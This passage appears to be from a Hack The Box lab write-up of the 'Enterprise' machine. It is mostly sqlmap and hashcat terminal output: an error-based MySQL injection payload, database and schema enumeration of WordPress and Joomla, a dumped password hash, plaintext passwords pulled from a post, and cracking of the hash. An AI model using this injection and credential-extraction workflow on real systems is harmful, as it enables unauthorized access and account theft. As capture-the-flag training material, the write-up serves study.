Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[13:01:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[13:01:44] [INFO] fetching database names
[13:01:44] [INFO] resumed: 'information_schema'
[13:01:44] [INFO] resumed: 'joomla'
[13:01:44] [INFO] resumed: 'joomladb'
[13:01:44] [INFO] resumed: 'mysql'
[13:01:44] [INFO] resumed: 'performance_schema'
[13:01:44] [INFO] resumed: 'sys'
[13:01:44] [INFO] resumed: 'wordpress'
[13:01:44] [INFO] resumed: 'wordpressdb'
available databases [8]:
[*] information_schema
[*] joomla
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[*] wordpressdb
[13:01:44] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 13:01:44 /2020-05-25/
Wordpress schema
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req -D wordpress --schema
___
__H__
___ ___[.]_____ ___ ___ {1.4.5#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:03:14 /2020-05-25/
[12:03:14] [INFO] parsing HTTP request from 'lcars_db.req'
[12:03:14] [INFO] resuming back-end DBMS 'mysql'
[12:03:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[12:03:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[12:03:15] [INFO] enumerating database management system schema
[12:03:15] [INFO] fetching tables for database: 'wordpress'
[12:03:15] [INFO] resumed: 'wp_commentmeta'
...
Database: wordpress
Table: wp_commentmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| comment_id | bigint(20) unsigned |
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
+------------+---------------------+
Database: wordpress
Table: wp_usermeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_key | varchar(255) |
| meta_value | longtext |
| umeta_id | bigint(20) unsigned |
| user_id | bigint(20) unsigned |
+------------+---------------------+
Database: wordpress
Table: wp_term_relationships
[3 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| object_id | bigint(20) unsigned |
| term_order | int(11) |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+
Database: wordpress
Table: wp_comments
[15 columns]
+----------------------+---------------------+
| Column | Type |
+----------------------+---------------------+
| comment_agent | varchar(255) |
| comment_approved | varchar(20) |
| comment_author | tinytext |
| comment_author_email | varchar(100) |
| comment_author_IP | varchar(100) |
| comment_author_url | varchar(200) |
| comment_content | text |
| comment_date | datetime |
| comment_date_gmt | datetime |
| comment_ID | bigint(20) unsigned |
| comment_karma | int(11) |
| comment_parent | bigint(20) unsigned |
| comment_post_ID | bigint(20) unsigned |
| comment_type | varchar(20) |
| user_id | bigint(20) unsigned |
+----------------------+---------------------+
Database: wordpress
Table: wp_terms
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| name | varchar(200) |
| slug | varchar(200) |
| term_group | bigint(10) |
| term_id | bigint(20) unsigned |
+------------+---------------------+
Database: wordpress
Table: wp_postmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
| post_id | bigint(20) unsigned |
+------------+---------------------+
Database: wordpress
Table: wp_options
[4 columns]
+--------------+---------------------+
| Column | Type |
+--------------+---------------------+
| autoload | varchar(20) |
| option_id | bigint(20) unsigned |
| option_name | varchar(191) |
| option_value | longtext |
+--------------+---------------------+
Database: wordpress
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| display_name | varchar(250) |
| user_activation_key | varchar(255) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(255) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+
Database: wordpress
Table: wp_termmeta
[4 columns]
+------------+---------------------+
| Column | Type |
+------------+---------------------+
| meta_id | bigint(20) unsigned |
| meta_key | varchar(255) |
| meta_value | longtext |
| term_id | bigint(20) unsigned |
+------------+---------------------+
Database: wordpress
Table: wp_posts
[23 columns]
+-----------------------+---------------------+
| Column | Type |
+-----------------------+---------------------+
| ID | bigint(20) unsigned |
| comment_count | bigint(20) |
| comment_status | varchar(20) |
| guid | varchar(255) |
| menu_order | int(11) |
| ping_status | varchar(20) |
| pinged | text |
| post_author | bigint(20) unsigned |
| post_content | longtext |
| post_content_filtered | longtext |
| post_date | datetime |
| post_date_gmt | datetime |
| post_excerpt | text |
| post_mime_type | varchar(100) |
| post_modified | datetime |
| post_modified_gmt | datetime |
| post_name | varchar(200) |
| post_parent | bigint(20) unsigned |
| post_password | varchar(255) |
| post_status | varchar(20) |
| post_title | text |
| post_type | varchar(20) |
| to_ping | text |
+-----------------------+---------------------+
Database: wordpress
Table: wp_term_taxonomy
[6 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| count | bigint(20) |
| description | longtext |
| parent | bigint(20) unsigned |
| taxonomy | varchar(32) |
| term_id | bigint(20) unsigned |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+
Database: wordpress
Table: wp_links
[13 columns]
+------------------+---------------------+
| Column | Type |
+------------------+---------------------+
| link_description | varchar(255) |
| link_id | bigint(20) unsigned |
| link_image | varchar(255) |
| link_name | varchar(255) |
| link_notes | mediumtext |
| link_owner | bigint(20) unsigned |
| link_rating | int(11) |
| link_rel | varchar(255) |
| link_rss | varchar(255) |
| link_target | varchar(25) |
| link_updated | datetime |
| link_url | varchar(255) |
| link_visible | varchar(20) |
+------------------+---------------------+
[12:03:15] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 12:03:15 /2020-05-25/
Wordpress table users
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req -D wordpress -T wp_users -C display_name,user_email,user_login,user_pass --dump
___
__H__
___ ___["]_____ ___ ___ {1.4.5#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:05:34 /2020-05-25/
[12:05:34] [INFO] parsing HTTP request from 'lcars_db.req'
[12:05:34] [INFO] resuming back-end DBMS 'mysql'
[12:05:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[12:05:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[12:05:36] [INFO] fetching entries of column(s) 'display_name, user_email, user_login, user_pass' for table 'wp_users' in database 'wordpress'
[12:05:36] [INFO] retrieved: 'william.riker'
[12:05:36] [INFO] retrieved: 'william.riker@enterprise.htb'
[12:05:36] [INFO] retrieved: 'william.riker'
[12:05:36] [INFO] retrieved: '$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.'
[12:05:36] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: wordpress
Table: wp_users
[1 entry]
+---------------+------------------------------+---------------+------------------------------------+
| display_name | user_email | user_login | user_pass |
+---------------+------------------------------+---------------+------------------------------------+
| william.riker | william.riker@enterprise.htb | william.riker | $P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2. |
+---------------+------------------------------+---------------+------------------------------------+
[12:05:44] [INFO] table 'wordpress.wp_users' dumped to CSV file '/home/u505/.sqlmap/output/enterprise.htb/dump/wordpress/wp_users.csv'
[12:05:44] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 12:05:44 /2020-05-25/
We try to brute force this hash.
u505@kali:~/HTB/Machines/Enterprise$ cat wpress.hash william.riker:$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2. u505@kali:~/HTB/Machines/Enterprise$ hashid '$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.' Analyzing '$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.' [+] Wordpress ≥ v2.6.2 [+] Joomla ≥ v2.5.18 [+] PHPass' Portable Hash
Hashcat it.
u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 400 --username wpress.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ... Session..........: hashcat Status...........: Exhausted Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5) Hash.Target......: $P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2. Time.Started.....: Thu May 21 19:21:14 2020 (1 min, 12 secs) Time.Estimated...: Thu May 21 19:22:26 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 199.6 kH/s (3.91ms) @ Accel:256 Loops:128 Thr:64 Vec:1 Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 14344384/14344384 (100.00%) Rejected.........: 0/14344384 (0.00%) Restore.Point....: 14344384/14344384 (100.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8064-8192 Candidates.#1....: $HEX[2321676f7468] -> $HEX[042a0337c2a156616d6f732103] Hardware.Mon.#1..: Temp: 67c Util: 63% Core:1202MHz Mem:2505MHz Bus:16
Started: Thu May 21 19:21:10 2020 Stopped: Thu May 21 19:22:27 2020
No luck.
Wordpress table wp_posts
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req --dump -D wordpress -T wp_posts -C ID,post_title,post_content ... [12:10:03] [INFO] table 'wordpress.wp_posts' dumped to CSV file '/home/u505/.sqlmap/output/enterprise.htb/dump/wordpress/wp_posts.csv' [12:10:03] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 12:10:03 /2020-05-25/
u505@kali:~/HTB/Machines/Enterprise$ grep "6[6-8]," /home/u505/.sqlmap/output/enterprise.htb/dump/wordpress/wp_posts.csv 66,Passwords,Needed somewhere to put some passwords quickly\r\n\r\nZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nZD3YxfnSjezg67JZ\r\n\r\nu*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n 67,Passwords,Needed somewhere to put some passwords quickly\r\n\r\nZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nu*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n 68,Passwords,Needed somewhere to put some passwords quickly\r\n\r\nZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nZD3YxfnSjezg67JZ\r\n\r\nu*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n
We store these password in a file.
u505@kali:~/HTB/Machines/Enterprise$ cat pass.txt ZxJyhGem4k338S2Y enterprisencc170 ZD3YxfnSjezg67JZ u*Z14ru0p#ttj83zS6
We try with these passwords
u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 400 --username wpress.hash pass.txt hashcat (v5.1.0) starting... ... u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 400 --username wpress.hash pass.txt --show william.riker:$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.:u*Z14ru0p#ttj83zS6
Joomla schema
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req -D joomladb --schema ... [13:26:50] [INFO] resumed: 'float unsigned' Database: joomladb Table: edz2g_finder_tokens_aggregate [11 columns] +----------------+---------------------+ | Column | Type | +----------------+---------------------+ | language | char(3) | | common | tinyint(1) unsigned | | context | tinyint(1) unsigned | | context_weight | float unsigned | | map_suffix | char(1) | | phrase | tinyint(1) unsigned | | stem | varchar(75) | | term | varchar(75) | | term_id | int(10) unsigned | | term_weight | float unsigned | | total_weight | float unsigned | +----------------+---------------------+
Database: joomladb Table: edz2g_redirect_links [10 columns] +---------------+------------------+ | Column | Type | +---------------+------------------+ | comment | varchar(255) | | header | smallint(3) | | id | int(10) unsigned | | created_date | datetime | | hits | int(10) unsigned | | modified_date | datetime | | new_url | varchar(2048) | | old_url | varchar(2048) | | published | tinyint(4) | | referer | varchar(2048) | +---------------+------------------+
Database: joomladb Table: edz2g_tags [30 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | id | int(10) unsigned | | language | char(7) | | level | int(10) unsigned | | path | varchar(400) | | version | int(10) unsigned | | alias | varchar(400) | | checked_out | int(11) unsigned | | checked_out_time | datetime | | created_by_alias | varchar(255) | | created_time | datetime | | created_user_id | int(10) unsigned | | description | mediumtext | | hits | int(10) unsigned | | images | text | | lft | int(11) | | metadata | varchar(2048) | | metadesc | varchar(1024) | | metakey | varchar(1024) | | modified_time | datetime | | modified_user_id | int(10) unsigned | | note | varchar(255) | | params | text | | parent_id | int(10) unsigned | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | rgt | int(11) | | title | varchar(255) | | urls | text | +------------------+------------------+
Database: joomladb Table: edz2g_extensions [18 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | element | varchar(100) | | name | varchar(100) | | ordering | int(11) | | state | int(11) | | type | varchar(20) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | client_id | tinyint(3) | | custom_data | text | | enabled | tinyint(3) | | extension_id | int(11) | | folder | varchar(100) | | manifest_cache | text | | package_id | int(11) | | params | text | | protected | tinyint(3) | | system_data | text | +------------------+------------------+
Database: joomladb Table: edz2g_content [30 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | access | int(10) unsigned | | fulltext | mediumtext | | id | int(10) unsigned | | language | char(7) | | ordering | int(11) | | state | tinyint(3) | | version | int(10) unsigned | | alias | varchar(400) | | asset_id | int(10) unsigned | | attribs | varchar(5120) | | catid | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | featured | tinyint(3) unsigned | | hits | int(10) unsigned | | images | text | | introtext | mediumtext | | metadata | text | | metadesc | text | | metakey | text | | modified | datetime | | modified_by | int(10) unsigned | | publish_down | datetime | | publish_up | datetime | | title | varchar(255) | | urls | text | | xreference | varchar(50) | +------------------+---------------------+
Database: joomladb Table: edz2g_finder_links_terms5 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_tokens [7 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | language | char(3) | | common | tinyint(1) unsigned | | context | tinyint(1) unsigned | | phrase | tinyint(1) unsigned | | stem | varchar(75) | | term | varchar(75) | | weight | float unsigned | +----------+---------------------+
Database: joomladb Table: edz2g_newsfeeds [30 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | id | int(10) unsigned | | language | char(7) | | link | varchar(2048) | | name | varchar(100) | | ordering | int(11) | | version | int(10) unsigned | | alias | varchar(400) | | cache_time | int(10) unsigned | | catid | int(11) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | description | text | | hits | int(10) unsigned | | images | text | | metadata | text | | metadesc | text | | metakey | text | | modified | datetime | | modified_by | int(10) unsigned | | numarticles | int(10) unsigned | | params | text | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | rtl | tinyint(4) | | xreference | varchar(50) | +------------------+------------------+
Database: joomladb Table: edz2g_core_log_searches [2 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | hits | int(10) unsigned | | search_term | varchar(128) | +-------------+------------------+
Database: joomladb Table: edz2g_postinstall_messages [14 columns] +------------------------+---------------------+ | Column | Type | +------------------------+---------------------+ | action | varchar(255) | | type | varchar(10) | | action_file | varchar(255) | | action_key | varchar(255) | | condition_file | varchar(255) | | condition_method | varchar(255) | | description_key | varchar(255) | | enabled | tinyint(3) | | extension_id | bigint(20) | | language_client_id | tinyint(3) | | language_extension | varchar(255) | | postinstall_message_id | bigint(20) unsigned | | title_key | varchar(255) | | version_introduced | varchar(50) | +------------------------+---------------------+
Database: joomladb Table: edz2g_content_types [8 columns] +-------------------------+------------------+ | Column | Type | +-------------------------+------------------+ | table | varchar(255) | | content_history_options | varchar(5120) | | field_mappings | text | | router | varchar(255) | | rules | text | | type_alias | varchar(400) | | type_id | int(10) unsigned | | type_title | varchar(255) | +-------------------------+------------------+
Database: joomladb Table: edz2g_fields_groups [16 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(11) | | id | int(10) unsigned | | language | char(7) | | ordering | int(11) | | state | tinyint(1) | | asset_id | int(10) unsigned | | checked_out | int(11) | | checked_out_time | datetime | | context | varchar(255) | | created | datetime | | created_by | int(10) unsigned | | description | text | | modified | datetime | | modified_by | int(10) unsigned | | note | varchar(255) | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_finder_links_terms6 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_terms4 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links [19 columns] +--------------------+------------------+ | Column | Type | +--------------------+------------------+ | access | int(5) | | language | varchar(8) | | object | mediumblob | | state | int(5) | | description | text | | end_date | datetime | | indexdate | datetime | | link_id | int(10) unsigned | | list_price | double unsigned | | md5sum | varchar(32) | | publish_end_date | datetime | | publish_start_date | datetime | | published | tinyint(1) | | route | varchar(255) | | sale_price | double unsigned | | start_date | datetime | | title | varchar(400) | | type_id | int(11) | | url | varchar(255) | +--------------------+------------------+
Database: joomladb Table: edz2g_messages_cfg [3 columns] +-----------+------------------+ | Column | Type | +-----------+------------------+ | cfg_name | varchar(100) | | cfg_value | varchar(255) | | user_id | int(10) unsigned | +-----------+------------------+
Database: joomladb Table: edz2g_fields_categories [2 columns] +-------------+---------+ | Column | Type | +-------------+---------+ | category_id | int(11) | | field_id | int(11) | +-------------+---------+
Database: joomladb Table: edz2g_finder_links_termse [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_terms [9 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | language | char(3) | | common | tinyint(1) unsigned | | links | int(10) | | phrase | tinyint(1) unsigned | | soundex | varchar(75) | | stem | varchar(75) | | term | varchar(75) | | term_id | int(10) unsigned | | weight | float unsigned | +----------+---------------------+
Database: joomladb Table: edz2g_banner_clients [14 columns] +-------------------+------------------+ | Column | Type | +-------------------+------------------+ | id | int(11) | | name | varchar(255) | | state | tinyint(3) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | contact | varchar(255) | | email | varchar(255) | | extrainfo | text | | metakey | text | | metakey_prefix | varchar(400) | | own_prefix | tinyint(4) | | purchase_type | tinyint(4) | | track_clicks | tinyint(4) | | track_impressions | tinyint(4) | +-------------------+------------------+
Database: joomladb Table: edz2g_finder_types [3 columns] +--------+------------------+ | Column | Type | +--------+------------------+ | id | int(10) unsigned | | mime | varchar(100) | | title | varchar(100) | +--------+------------------+
Database: joomladb Table: edz2g_schemas [2 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | extension_id | int(11) | | version_id | varchar(20) | +--------------+-------------+
Database: joomladb Table: edz2g_update_sites [7 columns] +----------------------+---------------+ | Column | Type | +----------------------+---------------+ | location | text | | name | varchar(100) | | type | varchar(20) | | enabled | int(11) | | extra_query | varchar(1000) | | last_check_timestamp | bigint(20) | | update_site_id | int(11) | +----------------------+---------------+
Database: joomladb Table: edz2g_assets [8 columns] +-----------+------------------+ | Column | Type | +-----------+------------------+ | id | int(10) unsigned | | level | int(10) unsigned | | name | varchar(50) | | lft | int(11) | | parent_id | int(11) | | rgt | int(11) | | rules | varchar(5120) | | title | varchar(100) | +-----------+------------------+
Database: joomladb Table: edz2g_fields [24 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(11) | | id | int(10) unsigned | | label | varchar(255) | | language | char(7) | | name | varchar(255) | | ordering | int(11) | | state | tinyint(1) | | type | varchar(255) | | asset_id | int(10) unsigned | | checked_out | int(11) | | checked_out_time | datetime | | context | varchar(255) | | created_time | datetime | | created_user_id | int(10) unsigned | | default_value | text | | description | text | | fieldparams | text | | group_id | int(10) unsigned | | modified_by | int(10) unsigned | | modified_time | datetime | | note | varchar(255) | | params | text | | required | tinyint(1) | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_banners [34 columns] +-------------------+---------------------+ | Column | Type | +-------------------+---------------------+ | id | int(11) | | language | char(7) | | name | varchar(255) | | ordering | int(11) | | reset | datetime | | state | tinyint(3) | | type | int(11) | | version | int(10) unsigned | | alias | varchar(400) | | catid | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | cid | int(11) | | clicks | int(11) | | clickurl | varchar(200) | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | custombannercode | varchar(2048) | | description | text | | impmade | int(11) | | imptotal | int(11) | | metakey | text | | metakey_prefix | varchar(400) | | modified | datetime | | modified_by | int(10) unsigned | | own_prefix | tinyint(1) | | params | text | | publish_down | datetime | | publish_up | datetime | | purchase_type | tinyint(4) | | sticky | tinyint(1) unsigned | | track_clicks | tinyint(4) | | track_impressions | tinyint(4) | +-------------------+---------------------+
Database: joomladb Table: edz2g_users [16 columns] +---------------+---------------+ | Column | Type | +---------------+---------------+ | id | int(11) | | name | varchar(400) | | password | varchar(100) | | activation | varchar(100) | | block | tinyint(4) | | email | varchar(100) | | lastResetTime | datetime | | lastvisitDate | datetime | | otep | varchar(1000) | | otpKey | varchar(1000) | | params | text | | registerDate | datetime | | requireReset | tinyint(4) | | resetCount | int(11) | | sendEmail | tinyint(4) | | username | varchar(150) | +---------------+---------------+
Database: joomladb Table: edz2g_ucm_history [10 columns] +-----------------+------------------+ | Column | Type | +-----------------+------------------+ | character_count | int(10) unsigned | | editor_user_id | int(10) unsigned | | keep_forever | tinyint(4) | | save_date | datetime | | sha1_hash | varchar(50) | | ucm_item_id | int(10) unsigned | | ucm_type_id | int(10) unsigned | | version_data | mediumtext | | version_id | int(10) unsigned | | version_note | varchar(255) | +-----------------+------------------+
Database: joomladb Table: edz2g_menu_types [6 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | id | int(10) unsigned | | asset_id | int(10) unsigned | | client_id | int(11) | | description | varchar(255) | | menutype | varchar(24) | | title | varchar(48) | +-------------+------------------+
Database: joomladb Table: edz2g_content_rating [4 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | content_id | int(11) | | lastip | varchar(50) | | rating_count | int(10) unsigned | | rating_sum | int(10) unsigned | +--------------+------------------+
Database: joomladb Table: edz2g_finder_filters [14 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | data | text | | state | tinyint(1) | | alias | varchar(255) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | filter_id | int(10) unsigned | | map_count | int(10) unsigned | | modified | datetime | | modified_by | int(10) unsigned | | params | mediumtext | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_messages [9 columns] +--------------+---------------------+ | Column | Type | +--------------+---------------------+ | state | tinyint(1) | | date_time | datetime | | folder_id | tinyint(3) unsigned | | message | text | | message_id | int(10) unsigned | | priority | tinyint(1) unsigned | | subject | varchar(255) | | user_id_from | int(10) unsigned | | user_id_to | int(10) unsigned | +--------------+---------------------+
Database: joomladb Table: edz2g_finder_taxonomy [6 columns] +-----------+---------------------+ | Column | Type | +-----------+---------------------+ | access | tinyint(1) unsigned | | id | int(10) unsigned | | ordering | tinyint(1) unsigned | | state | tinyint(1) unsigned | | parent_id | int(10) unsigned | | title | varchar(255) | +-----------+---------------------+
Database: joomladb Table: edz2g_user_keys [7 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | id | int(10) unsigned | | time | varchar(200) | | token | varchar(255) | | invalid | tinyint(4) | | series | varchar(191) | | uastring | varchar(255) | | user_id | varchar(150) | +----------+------------------+
Database: joomladb Table: edz2g_contact_details [43 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | access | int(10) unsigned | | id | int(11) | | language | varchar(7) | | name | varchar(255) | | ordering | int(11) | | state | varchar(100) | | version | int(10) unsigned | | address | text | | alias | varchar(400) | | catid | int(11) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | con_position | varchar(255) | | country | varchar(100) | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | default_con | tinyint(1) unsigned | | email_to | varchar(255) | | fax | varchar(255) | | featured | tinyint(3) unsigned | | hits | int(10) unsigned | | image | varchar(255) | | metadata | text | | metadesc | text | | metakey | text | | misc | mediumtext | | mobile | varchar(255) | | modified | datetime | | modified_by | int(10) unsigned | | params | text | | postcode | varchar(100) | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | sortname1 | varchar(255) | | sortname2 | varchar(255) | | sortname3 | varchar(255) | | suburb | varchar(100) | | telephone | varchar(255) | | user_id | int(11) | | webpage | varchar(255) | | xreference | varchar(50) | +------------------+---------------------+
Database: joomladb Table: edz2g_fields_values [3 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | value | text | | field_id | int(10) unsigned | | item_id | varchar(255) | +----------+------------------+
Database: joomladb Table: edz2g_finder_links_termsa [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_termsb [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_modules [18 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | access | int(10) unsigned | | content | text | | id | int(11) | | language | char(7) | | module | varchar(50) | | ordering | int(11) | | position | varchar(50) | | asset_id | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | client_id | tinyint(4) | | note | varchar(255) | | params | text | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | showtitle | tinyint(3) unsigned | | title | varchar(100) | +------------------+---------------------+
Database: joomladb Table: edz2g_overrider [4 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | file | varchar(255) | | id | int(10) | | constant | varchar(255) | | string | text | +----------+--------------+
Database: joomladb Table: edz2g_updates [14 columns] +----------------+---------------+ | Column | Type | +----------------+---------------+ | data | text | | element | varchar(100) | | name | varchar(100) | | type | varchar(20) | | version | varchar(32) | | client_id | tinyint(3) | | description | text | | detailsurl | text | | extension_id | int(11) | | extra_query | varchar(1000) | | folder | varchar(20) | | infourl | text | | update_id | int(11) | | update_site_id | int(11) | +----------------+---------------+
Database: joomladb Table: edz2g_user_notes [15 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | id | int(10) unsigned | | state | tinyint(3) | | body | text | | catid | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created_time | datetime | | created_user_id | int(10) unsigned | | modified_time | datetime | | modified_user_id | int(10) unsigned | | publish_down | datetime | | publish_up | datetime | | review_time | datetime | | subject | varchar(100) | | user_id | int(10) unsigned | +------------------+------------------+
Database: joomladb Table: edz2g_finder_links_terms0 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_terms9 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_user_profiles [4 columns] +---------------+--------------+ | Column | Type | +---------------+--------------+ | ordering | int(11) | | profile_key | varchar(100) | | profile_value | text | | user_id | int(11) | +---------------+--------------+
